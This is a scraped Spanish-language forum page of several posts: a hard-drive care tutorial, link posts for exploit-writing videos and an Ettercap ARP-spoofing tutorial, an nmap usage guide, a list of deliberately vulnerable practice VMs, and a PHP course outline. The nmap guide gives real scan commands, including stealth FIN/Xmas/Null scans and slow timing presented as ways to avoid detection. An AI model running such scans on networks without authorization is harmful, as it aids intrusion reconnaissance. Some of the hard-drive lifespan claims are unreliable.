En fin, espero que este tutorial os sirva para disfrutar durante un tiempo bastante largo de vuestro disco duro, en la seguridad de que en condiciones normales lo vais a jubilar antes por viejo, lento y poca capacidad que por haber fallado por desgaste de uso.
Autor: Josito
El mantenimiento de un disco duro se debe mirar desde dos aspectos diferentes. Uno es el mantenimiento del disco en sí, desde el punto de vista de hardware y otro es el mantenimiento del disco duro en temas de software.
Vamos a empezar por el mantenimiento del disco duro como tal, es decir, como un componente del ordenador, y de camino vamos a ver la verdad que encierran algunos comentarios que circular por ahí.
Mantenimiento del disco duro (hardware):
El disco duro es un componente de harware bastante macizo, pesado... y bastante delicado, que, como todo elemento de nuestro ordenador, necesita de una cierta atención.
Lo primero que tenemos que tener en cuenta es que se trata de un elemento de alta precisión, con unos discos internos que giran normalmente a 7.200 rpm y con unas cabezas lectoras que se desplazan a una gran velocidad a una distancia de los discos que se calcula en micras (una mota de polvo no cabe entre la cabeza y en disco), pero que en ningún momento pueden tocar este, ya que entonces ocurriría lo que se conoce como un aterrizaje de cabezales, con el consiguiente daño tanto para el disco como para el cabezal.
Con todo esto, la primera conclusión que se saca es que no es nada recomendable hacer movimientos bruscos del equipo si este está encendido, ya que hay que tener en cuenta que si bien las cabezas cuando no están leyendo o escribiendo se encuentran en una posición de reposo (en los discos muy antiguos había que aparcar los cabezales), un golpe o movimiento brusco pueden desplazar los cabezales, produciéndose el aterrizaje ya mencionado.
Con los discos externos debemos tener especial cuidado, ya que, aunque esté apagado, un golpe fuerte puede dañar el disco de forma irreparable.
También debemos asegurarnos de que tenga las menores vibraciones posibles, ya que un exceso de vibraciones en el disco duro puede llegar a dañarlo.
Otro factor muy importante es la temperatura de funcionamiento del disco. Un disco duro suele tener una temperatura de trabajo de entre 45º y 50º, con un tope operativo de sobre 60º. Unas temperaturas superiores a estas pueden causar un mal funcionamiento y, a la larga, provocar una avería. Es muy conveniente, sobre todo si nuestros programas o hábitos de uso del ordenador implican unos accesos al disco constantes y grandes, que le pongamos algún medio de refrigeración extra. Hay en el mercado disipadores diseñados especialmente para los discos duros que no son caros y van muy bien.
También es conveniente limpiarlo a menudo. Recordad que el polvo hace de aislante e impide una buena refrigeración.
Fundamental es que los voltajes que recibe sean los correctos (recibe tanto 12v como 5v), por lo que una buena fuente de alimentación y un estabilizador son dos cosas muy importantes para la salud de nuestro disco duro, aunque esto es común para todo el ordenador.
Y ahora vamos a ver algunas ''cosillas'' y comentarios que circulan por esos mundos y vamos a ver su fundamento y verdad.
- Formatear el disco duro acorta su vida y lo puede dañar:
No hay ninguna base en esta afirmación. Cuando se formatea un disco duro lo único que estamos haciendo son operaciones de escritura, y además el desplazamiento de los cabezales en este tipo de operaciones es bastante más lineal y constante que en una operación normal de lectura/escritura, por lo que el desgaste del disco es incluso inferior a cuando estamos trabajando con él.
Otra cosa es cuando se trata de un formateo a bajo nivel o de la utilización de programas de recuperación de discos. Estos procesos sí que suponen una altísima carga de trabajo para el disco duro y pueden acortar su vida útil, pero en ningún caso de forma significativa. Además, cuando recurrimos a estos sistemas es porque tenemos serios problemas en el disco, y en la mayoría de los casos las opciones son o emplear estos sistemas o tirar el disco, lo que sí que acorta drásticamente su vida útil.
- Montar un disco en RAID alarga su vida:
Esta teoría sólo sería válida para un RAID 0 en varios discos, pero ojo, por montar dos discos no quiere decir que la vida útil se duplique, simplemente que van a tener menos carga de trabajo al repartirse las operaciones de lectura/escritura, pero esto, como ya hemos visto, sólo es una parte de la ecuación. En otros tipos de RAID no hay ninguna diferencia.
El desgaste es mínimo en operaciones de lectura/escritura, y además los discos siempre están girando.
- Hacer varias particiones es bueno/malo para el disco duro:
Pongo bueno/malo porque se han dicho ambas cosas, y ambas son falsas. Para el disco duro no supone ninguna diferencia el estar dividido en una, dos o más particiones.
- Tal sistema operativo acorta la vida del disco duro:
Ultimamente han circulado rumores de que Ubutu acorta el ciclo de vida útil de los discos duros, sobre todo en portátiles. Esto es algo totalmente falso. La vida útil de un disco no depende del sistema operativo que tengamos instalado, sino de otros factores.
- Es mejor apagar el ordenador y volver a encenderlo que reiniciar (reset):
Pues para la vida del disco no. Mientras que apagar y encender supone parar el disco duro y volver a encenderlo, reiniciar no supone una paradadel disco, por lo que el desgaste es menor.
Por cierto, que lo que si que es bastante perjudicial es apagar y encender el equipo sin dejar un cierto tiempo para que se detenga totalmente el giro del disco duro.
En todo caso, siempre es mucho más perjudicial apagar o resetear desde el ordenador (con los botones de apagado o de reset) que hacerlo desde el sistema operativo.
- Es bueno apagar el ordenador cuando no lo utilicemos:
Pues si lo miramos bajo el punto de vista de un ahorro de energía, sí, pero si lo miramos bajo el punto de vista de mantenimiento del disco duro, no. Un disco duro es precisamente en los procesos de apagado/encendido cuando más sufre y más desgaste tiene, no por que tenga que trabajar más leyendo datos para el arranque, sino por el simple hecho de arrancar.
En general podemos decir que se debe apagar el ordenador cuando el tiempo de inactividad de este vaya a ser superior a las tres o cuatro horas. Si el tiempo de inactividad va a ser menor son preferibles otros métodos, como suspensión, hibernación o inactividad, que producen un arranque del disco menos brusco que un apagado y posterior encendido del sistema. Lo que si que es bueno en general es apagar totalmente el equipo, desconectándolo de la corriente.
La vida media de un disco se mide en ciclos de inicio/parada, y un disco normal suele tener una vida superior a los 50.000 ciclos (este es el mínimo que garantizan la mayoría de fabricantes), lo que hace que su vida útil sea bastante larga.
Evidentemente hay otros factores que influyen en la vida útil de un disco duro, pero en condiciones normales de uso con un trabajo bastante intensivo esta vida útil está por encima (teóricamente) de los 30 años, siendo este ciclo superado en discos de gama alta y discos especiales para servidores.
En mi caso, tengo un Olivetti 80286 con casi 20 años y el disco duro es el original y funciona a la perfección (y eso que ni las calidades de los materiales ni la tecnología de fabricación eran las mismas en aquella época).
Que un disco sólo nos dure un par de años tan sólo es síntoma de una baja calidad de este o, en la gran mayoría de las ocasiones, de un mal uso del mismo, del que sólo nosotros somos responsables. Decir que un disco duro ha durado tres o cuatro años no es precisamente una buena marca. Hay que tener en cuenta que muchos fabricantes de discos duros ofrecen una garantía de tres años, y si hacen esto es porque no esperan ningún problema en ese periodo de tiempo.
Y ya que en ello estamos, por todo lo expuesto anteriormente, es fácil comprender que la vida útil de un disco duro en un portátil sea inferior a la de un disco duro en un ordenador de sobremesa, a pesar de un especial diseño en cuanto a resistencia y tolerancia a golpes y vibraciones superior en el caso de discos para portátiles, así como unas inercias de giro bastante menores. También influye bastante en este tipo de ordenadores los gestores de energía (sobre todo cuando funcionan a batería), que obligan al disco duro a un número excesivamente alto de paradas, y por lo tanto, de ciclos de inicio/parada.
Y ahora vamos a ver un poco el mantenimiento del software, que sí que influye en su desgaste y vida útil, así como en su rendimiento.
Mantenimiento del disco duro (software):
Como ya hemos visto en la parte de este tutorial relativa al hardware, micho se ha dicho de disco en RAID, de apagar el ordenador, de particiones... pero muchas veces nos olvidamos de cómo ahorrarle trabajo a nuestro disco, y esto se hace manteniendo nuestro software en condiciones.
Una bueno forma es hacer un buen mantenimiento de éste de forma periódica, procurando que la información de se encuentre lo menos fragmentada que sea posible. Con ellos no es que las cabezas vayan a efectuar menos operaciones de lectura/escritura (que van a hacer las mismas), sino que los desplazamientos de las cabezas van a ser menos bruscos y menos amplios. Esto va a afectar sobre todo al rendimiento del disco duro y de paso también en su conservación, ya que movimientos menos bruscos y amplios significa también generar menos temperatura.
Por último, vamos a ver cuales son los grandes enemigos de nuestro disco duro:
- Golpes y movimientos bruscos.
Esto es muy malo con los discos en movimiento, pero también lo es con los discos parados, incluso desconectados.
- Una mala alimentación.
Una mala alimentación y cortes o sobrecargas eléctricas pueden incluso dejar nuestro disco totalmente inutilizado.
- Una mala refrigeración.
Un trabajo constante por encima de su temperatura media de funcionamiento termina por bajar su rendimiento y por estropear físicamente el disco duro.
- Una fuente magnética muy intensa.
Una fuente magnética muy intensa no sólo nos puede borrar los datos, sino que puede dañar de forma irrecuperable los discos internos de nuestro disco duro. Evidentemente un disco duro está bastante bien protegido, pero cuando lo tengamos desinstalado debemos tener mucho cuidado y mirar muy bien donde lo colocamos.
En fin, espero que este tutorial os sirva para disfrutar durante un tiempo bastante largo de vuestro disco duro, en la seguridad de que en condiciones normales lo vais a jubilar antes por viejo, lento y poca capacidad que por haber fallado por desgaste de uso.
Autor: Josito
#176
Hacking / Creando un Exploit paso a paso
Marzo 30, 2012, 07:40:37 AM
¿Cómo encontrar vulnerabilidades, escribir código shell, aprovechar la vulnerabilidad encontrada y finalmente, convertirlo en un módulo de Metasploit?, son algunas de las interrogantes que alguna vez nos hemos realizado y David Hoelzer , Senior Fellow en el Instituto SANS nos las resuelve con esta serie de vídeo tutoriales.
En los siguientes videoturiales, aprenderemos de la mano de David Hoelzer, como crear un Exploit paso a paso y convertirlo en un modulo de Metasploit para después utilizarlo con este excelente framework; aunque los vídeos se encuentran en ingles, son bastante prácticos y visuales, con lo que no tendremos ningún problema al seguirlos.
Videos:
Exploits - Part 1
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 2 - 1
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 2 - 2
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 3 - 1
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 3 - 2
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 4 - 1
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 4 - 2
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
En los siguientes videoturiales, aprenderemos de la mano de David Hoelzer, como crear un Exploit paso a paso y convertirlo en un modulo de Metasploit para después utilizarlo con este excelente framework; aunque los vídeos se encuentran en ingles, son bastante prácticos y visuales, con lo que no tendremos ningún problema al seguirlos.
Videos:
Exploits - Part 1
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 2 - 1
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 2 - 2
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 3 - 1
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 3 - 2
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 4 - 1
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Exploits - Part 4 - 2
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#177
Hacking / Nmap [Usos Básicos]
Marzo 30, 2012, 07:39:47 AM
Hola, que tal...
En este pequeño "manual" tratare de explicar el uso básico de esta herramienrta: nmap
¿Que es nmap?
Básicamente nmap es una herramienta con la que podemos escanear redes grandes o pequeñas y poder determinar los equipos activos y los servicios de los mismos.
Conceptos básicos:
¿Que es un puerto?:
Un puerto es una zona en la que dos ordenadores (hosts) intercambian información
¿Que es un servicio?:
Un servicio es el tipo de información que se intercambia con una utilidad determinada como ssh o telnet.
¿Que es un Firewall?:
Un firewall acepta o no el trafico entrante o saliente de un ordenador.
¿Que son paquetes SYN?:
Así por encima, pueden ser paquetes que abren un intento de establecer una conexión TCP.
Como instalar nmap[?]
Es tan sencillo como ir en una terminal y teclear:
Código: text
Esto para sistemas Operativos Debian y derivados del mismo [Ubuntu, Linux Mint, etc..]
En S.O como Windows puedes ir a la pagina de Nmap y vas a la seccion de descargas, lo bajas y lo instalas.

Escaneo basico:
Código: text
Pues bien, llegó la hora de hacer nuestro primer uso de esta tool, primero vamos a una terminal o al simbolo del sistema, nos logeamos como root [o admin] segun su S.O y tecleamos:
Código: text
En concreto empezara a trabajar nmap...
Bien con nmap estamos llamando al programa, localhost es el equipo que deseamos escanear...

Para escanear un rango determinado de puertos para una ip lo haremos de la siguiente manera. Opción -p
Código: text

Como podemos ver, en mi caso no me detecto ningun puerto abierto...
Tambien podemos pedir que nmap nos haga un escaneo de diferentes puertos, por ejemplo:
Código: text

Y como podemos ver, me muestra que el puerto 1 esta cerrado, al igual que el puerto, 22,23, y el 30 esta abierto [ya que abri el puerto con netcat]
Bien, ahora estamos en una red de la cual queremos saber que computadoras tienen, por ejemplo el puerto 445 abierto,lo podemos hacer asi:
Código: text
Podemos usar la opción -P0, puede servirnos si lo que queremos es que no intente hacer ping a un servidor antes de escanearlo, es muy útil para maquinas que tienen firewall o no responden a ping.
Código: text
Tambien, podemos hacer un escaneo a una maquina haciendo Ping, con la opcion -sP
Código: text
Podemos tambien escanear algun puerto y ver la version del servicio que corre, para esto usamos la opcion -sV, por ejemplo, queremos ver que version de ftp corre alguna maquina:
Código: text

Otra opcion interesante es la flag -O , que nos permite saber que S.O esta corriendo el host que estamos escaneando, su uso es algo como:
Código: text

También podemos hacer un escaneo ya sea a una alta velocidad o una baja velocidad para no ser detectados, esto lo podemos hacer mediante la opcion -T seguidamente de un numero dentro del rango 0-5.
Las opciones anteriores van de la menor velocidad (0) a la mayor velocidad (5) de escaneo. Por ejemplo podemos hacer:
Código: text

OTRAS OPCIONES:
[-sS] Escaneo TCP SYN se envían paquetes SYN, denominada como escaneo medio abierto porque envía paquetes como si se fuese a abrir una conexión.
Debemos ser root para poder usar esta opción.
[Opciones -sF -sX -sN] Modos Stealth FIN, Xmas Tree o Nul scan respectivamente. Con estos modos seremos muy pero muy clandestinos, asi que si nos encontramos con un filtro o algun firewall que no nos dejen enviar paquetes SYN a determinado(s) puerto(s) podemos usar alguna de estas opciones.
Debemos ser root para poder usar estas opciones.
[-v] El Famoso verbose: Nos muestra informacion mas amplia de nustro escaneo
[-h] Muestra la ayuda de nmap
By [Z]tuX
Source: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
En este pequeño "manual" tratare de explicar el uso básico de esta herramienrta: nmap
¿Que es nmap?
Básicamente nmap es una herramienta con la que podemos escanear redes grandes o pequeñas y poder determinar los equipos activos y los servicios de los mismos.
Conceptos básicos:
¿Que es un puerto?:
Un puerto es una zona en la que dos ordenadores (hosts) intercambian información
¿Que es un servicio?:
Un servicio es el tipo de información que se intercambia con una utilidad determinada como ssh o telnet.
¿Que es un Firewall?:
Un firewall acepta o no el trafico entrante o saliente de un ordenador.
¿Que son paquetes SYN?:
Así por encima, pueden ser paquetes que abren un intento de establecer una conexión TCP.
Como instalar nmap[?]
Es tan sencillo como ir en una terminal y teclear:
sudo apt-get install nmap
Esto para sistemas Operativos Debian y derivados del mismo [Ubuntu, Linux Mint, etc..]
En S.O como Windows puedes ir a la pagina de Nmap y vas a la seccion de descargas, lo bajas y lo instalas.

Escaneo basico:
$ nmap [Tipos(s)de escaneo] [Opciones] <servidor o red>
Pues bien, llegó la hora de hacer nuestro primer uso de esta tool, primero vamos a una terminal o al simbolo del sistema, nos logeamos como root [o admin] segun su S.O y tecleamos:
nmap localhost
En concreto empezara a trabajar nmap...
Bien con nmap estamos llamando al programa, localhost es el equipo que deseamos escanear...

Para escanear un rango determinado de puertos para una ip lo haremos de la siguiente manera. Opción -p
nmap -p 1-80 localhost

Como podemos ver, en mi caso no me detecto ningun puerto abierto...
Tambien podemos pedir que nmap nos haga un escaneo de diferentes puertos, por ejemplo:
nmap -p 1,22,23,30 localhost

Y como podemos ver, me muestra que el puerto 1 esta cerrado, al igual que el puerto, 22,23, y el 30 esta abierto [ya que abri el puerto con netcat]
Bien, ahora estamos en una red de la cual queremos saber que computadoras tienen, por ejemplo el puerto 445 abierto,lo podemos hacer asi:
nmap -p 445 192.168.1.2-254
Podemos usar la opción -P0, puede servirnos si lo que queremos es que no intente hacer ping a un servidor antes de escanearlo, es muy útil para maquinas que tienen firewall o no responden a ping.
nmap -P0 192.168.1.65
Tambien, podemos hacer un escaneo a una maquina haciendo Ping, con la opcion -sP
nmap -sP 192.168.1.65
Podemos tambien escanear algun puerto y ver la version del servicio que corre, para esto usamos la opcion -sV, por ejemplo, queremos ver que version de ftp corre alguna maquina:
nmap -sV -p 21 192.168.1.65

Otra opcion interesante es la flag -O , que nos permite saber que S.O esta corriendo el host que estamos escaneando, su uso es algo como:
nmap -O 192.168.1.65

También podemos hacer un escaneo ya sea a una alta velocidad o una baja velocidad para no ser detectados, esto lo podemos hacer mediante la opcion -T seguidamente de un numero dentro del rango 0-5.
Las opciones anteriores van de la menor velocidad (0) a la mayor velocidad (5) de escaneo. Por ejemplo podemos hacer:
nmap -T 5 192.168.1.65

OTRAS OPCIONES:
[-sS] Escaneo TCP SYN se envían paquetes SYN, denominada como escaneo medio abierto porque envía paquetes como si se fuese a abrir una conexión.
Debemos ser root para poder usar esta opción.
[Opciones -sF -sX -sN] Modos Stealth FIN, Xmas Tree o Nul scan respectivamente. Con estos modos seremos muy pero muy clandestinos, asi que si nos encontramos con un filtro o algun firewall que no nos dejen enviar paquetes SYN a determinado(s) puerto(s) podemos usar alguna de estas opciones.
Debemos ser root para poder usar estas opciones.
[-v] El Famoso verbose: Nos muestra informacion mas amplia de nustro escaneo
[-h] Muestra la ayuda de nmap
By [Z]tuX
Source: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#178
Hacking / Tutorial Ettercap + etterfilter by k43l
Marzo 30, 2012, 07:38:30 AM
Bueno, ayer me puse hacer un tutorial de un filtro conocido en Ettercap, se trata de "Etterfilter" y de como podemos reemplazar las imagenes de las Paginas Web visitadas por la imagen que nosotros quermos realizando la conocida tecnica de Arp Spoofing, espero que sea de su agrado y cualquier consulta o critica constructiva es bienvenida.
salu2
link: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#179
Hacking / Mapa conceptual del hacking
Marzo 30, 2012, 07:37:11 AM
Este mapa lo encontre muy bueno hasta ise una disertancion en la universidad xDDDDD.
en el mapa podras ver:
La tentaciones
Los eventos de hacking
El hacktivismo
Hacking Tecnicos
Valores del Hacking
Ciber Peligro
El Link de la hipermapa conceptual
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Saludos!
en el mapa podras ver:
La tentaciones
Los eventos de hacking
El hacktivismo
Hacking Tecnicos
Valores del Hacking
Ciber Peligro
El Link de la hipermapa conceptual
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Saludos!
#180
Hacking / Recursos y aplicaciones de PENTEST
Marzo 30, 2012, 07:36:35 AM
Aquí una lista de algunos recursos con aplicaciones vulnerables diseñadas especialmente para pruebas de pentest en un entorno seguro y legal. Son un conjunto de LiveCDs inseguros y máquinas virtuales diseñados para ser utilizados como objetivos para la enumeración, la explotación web, descifrado de contraseñas y la ingeniería inversa y elevación de privilegios.
Estos recursos no deben ser utilizados bajo entornos de producción ya que están diseñados para ser explotados y son totalmente inseguros. Se deben utilizar de forma virtualizada.
HOLYNIX
Similar a De-ice y pWnOS, es una imagen vmware server ubuntu que fue construida para que los agujeros de seguridad sean aprovechados a efectos de pruebas de penetración.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
De-ICE LiveCDs
Son la creación de Thomas Wilhelm, quien fue transferido a un equipo de pruebas de penetración en la empresa para la que trabajaba. Por la necesidad de aprender tanto sobre las pruebas de penetración lo más rápidamente posible, Thomas comenzó a buscar los instrumentos y metas. Él encontró una serie de herramientas, pero no utilizables para la práctica. Finalmente, en un intento por reducir la brecha de aprendizaje, Thomas creó escenarios PenTest usando LiveCDs.
Los escenarios que están disponibles en De-Ice son:
De-Ice escenario 1:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
De-Ice escenario 2:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
De-Ice escenario 3:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
pWnOS
Es una imagen virtual con diferentes puntos de entrada donde el objetivo final es conseguir root
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Metasploitable
Metasploitable es un servidor con Ubuntu 8.04 en una imagen VMWare. Incluye una serie de paquetes vulnerables, entre estas una instalación de Tomcat 5.5 (con credenciales débil), tikiwiki distcc, twiki, y mysql.
Descarga metasploitable:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Web Security Dojo
Libre y de código abierto para la seguridad en aplicaciones web contiene Tools + objetivos
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Damn Vulnerable Web app DVWA 1.07
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
MOTH
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
KIOPTRIX
Kioptrix es otro "OS diseñado para ser vulnerable" (como De-ICE, Metasploitable y pWnOS), con el objetivo de pasar de "boot" a "root" por cualquier medio posible
[color=red=No tienes permitido ver enlaces. Registrate o Entra a tu cuenta Kioptrix Level 1[/color]
[color=red=No tienes permitido ver enlaces. Registrate o Entra a tu cuenta Kioptrix Level 2 [/color]
OWASPBWA
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
BADSTORE
Badstore.net se dedica a ayudar a entender cómo los piratas informáticos se aprovechan de vulnerabilidades de aplicaciones Web, y le muestra cómo reducir la exposición.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
WackoPicko
WackoPicko es un sitio web que contiene vulnerabilidades conocidas.
Un análisis de black-box Web Vulnerability Scanners se encuentra en :
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Lampsecurity
LAMPSecurity está diseñado para ser una serie de imágenes de máquinas virtuales vulnerable junto con la documentación complementaria diseñado para enseñar sobre seguridad en GNU/Linux, Apache, php, y mysql.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
bueno eso es todo espero que les guste mucho
saludos
Estos recursos no deben ser utilizados bajo entornos de producción ya que están diseñados para ser explotados y son totalmente inseguros. Se deben utilizar de forma virtualizada.
HOLYNIX
Similar a De-ice y pWnOS, es una imagen vmware server ubuntu que fue construida para que los agujeros de seguridad sean aprovechados a efectos de pruebas de penetración.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
De-ICE LiveCDs
Son la creación de Thomas Wilhelm, quien fue transferido a un equipo de pruebas de penetración en la empresa para la que trabajaba. Por la necesidad de aprender tanto sobre las pruebas de penetración lo más rápidamente posible, Thomas comenzó a buscar los instrumentos y metas. Él encontró una serie de herramientas, pero no utilizables para la práctica. Finalmente, en un intento por reducir la brecha de aprendizaje, Thomas creó escenarios PenTest usando LiveCDs.
Los escenarios que están disponibles en De-Ice son:
De-Ice escenario 1:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
De-Ice escenario 2:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
De-Ice escenario 3:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
pWnOS
Es una imagen virtual con diferentes puntos de entrada donde el objetivo final es conseguir root
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Metasploitable
Metasploitable es un servidor con Ubuntu 8.04 en una imagen VMWare. Incluye una serie de paquetes vulnerables, entre estas una instalación de Tomcat 5.5 (con credenciales débil), tikiwiki distcc, twiki, y mysql.
Descarga metasploitable:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Web Security Dojo
Libre y de código abierto para la seguridad en aplicaciones web contiene Tools + objetivos
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Damn Vulnerable Web app DVWA 1.07
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
MOTH
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
KIOPTRIX
Kioptrix es otro "OS diseñado para ser vulnerable" (como De-ICE, Metasploitable y pWnOS), con el objetivo de pasar de "boot" a "root" por cualquier medio posible
[color=red=No tienes permitido ver enlaces. Registrate o Entra a tu cuenta Kioptrix Level 1[/color]
[color=red=No tienes permitido ver enlaces. Registrate o Entra a tu cuenta Kioptrix Level 2 [/color]
OWASPBWA
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
BADSTORE
Badstore.net se dedica a ayudar a entender cómo los piratas informáticos se aprovechan de vulnerabilidades de aplicaciones Web, y le muestra cómo reducir la exposición.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
WackoPicko
WackoPicko es un sitio web que contiene vulnerabilidades conocidas.
Un análisis de black-box Web Vulnerability Scanners se encuentra en :
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Lampsecurity
LAMPSecurity está diseñado para ser una serie de imágenes de máquinas virtuales vulnerable junto con la documentación complementaria diseñado para enseñar sobre seguridad en GNU/Linux, Apache, php, y mysql.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
bueno eso es todo espero que les guste mucho
saludos
#181
Back-end / Taller de PHP: Temario
Marzo 30, 2012, 07:30:32 AM¡Bienvenidos al taller de PHP! En este curso aprenderás a generar páginas dinámicas del lado del servidor. También a integrarlas con MySql, por ejemplo. El objetivo principal es que aprendas los conceptos básicos para poder desarrollar sitios y aplicaciones web dinámicas. Al final del taller podrás crear tu propio blog (código de programación).
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Qué es PHP?
- Nuestro primer Script: Generando un Hola Mundo
- ¿Que son las variables?
- ¿Qué es PHP?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Reconocimiento de Variables
- Tipos de Variables
- ¿Qué son las constantes?
- Diferencias entre Variables y Constantes
- Reconocimiento de Variables
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Qué son los condicionales?
- Diferentes tipos
- Casos de uso
- ¿Qué son los condicionales?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Qué son los operadores?
- Los 4 tipos de operadores
- ¿Qué son los operadores?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Qué son los bucles?
- Diferentes tipos
- while
- do while
- ¿Qué son los bucles?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- for
- foreach
- for
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Cómo armar un formulario para que sea procesado por Php?
- Diferentes formas de enviar un formulario
- Variables POST y GET
- ¿Cómo armar un formulario para que sea procesado por Php?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Cómo procesar un formulario?
- ¿Diferentes tipos de campos?
- Inputs
- ¿Cómo procesar un formulario?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Textarea
- Textarea
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Selectbox
- Selectbox
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Recibiendo los datos
- contacto_script.php
- Cuerpo del mensaje
- Función mail
- Script completo
- Recibiendo los datos
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Qué son las funciones?
- ¿Para qué sirven?
- Casos de uso
- ¿Qué son las funciones?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Qué son las sesiones?
- ¿Qué son las cookies?
- Diferentes formas de utilizarlas
- ¿Qué son las sesiones?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Trabajar con Base de datos
- Importancia de las mismas en páginas dinámicas
- Diferentes tipos de base de datos
- Trabajar con Base de datos
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Introducción a MySql
- Ventajas y desventajas
- Conectarse con la base de datos desde Php
- Introducción a MySql
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Qué es phpMyAdmin?
- ¿Por qué usarlo?
- ¿Qué otras alternativas existen?
- ¿Qué es phpMyAdmin?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Cómo crear una tabla?
- Diferentes tipos de campos
- ¿Qué son los índices?
- ¿Cómo crear una tabla?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Diferentes tipos de consultas
- Ordenar nuestras consultas
- Filtrar las consultas
- Diferentes tipos de consultas
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- ¿Cómo insertar nuevos registros en la base de datos?
- Casos de uso
- ¿Cómo insertar nuevos registros en la base de datos?
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Actualizando datos ya guardados y Borrando registros
- Actualizando datos ya guardados y Borrando registros
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Utilización de JOINS en las consultas a la base de datos
- Utilización de JOINS en las consultas a la base de datos
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- Obtener cuentas, valores máximos y mínimos directamente de la base de datos
- Limitar las consultas
- Obtener cuentas, valores máximos y mínimos directamente de la base de datos
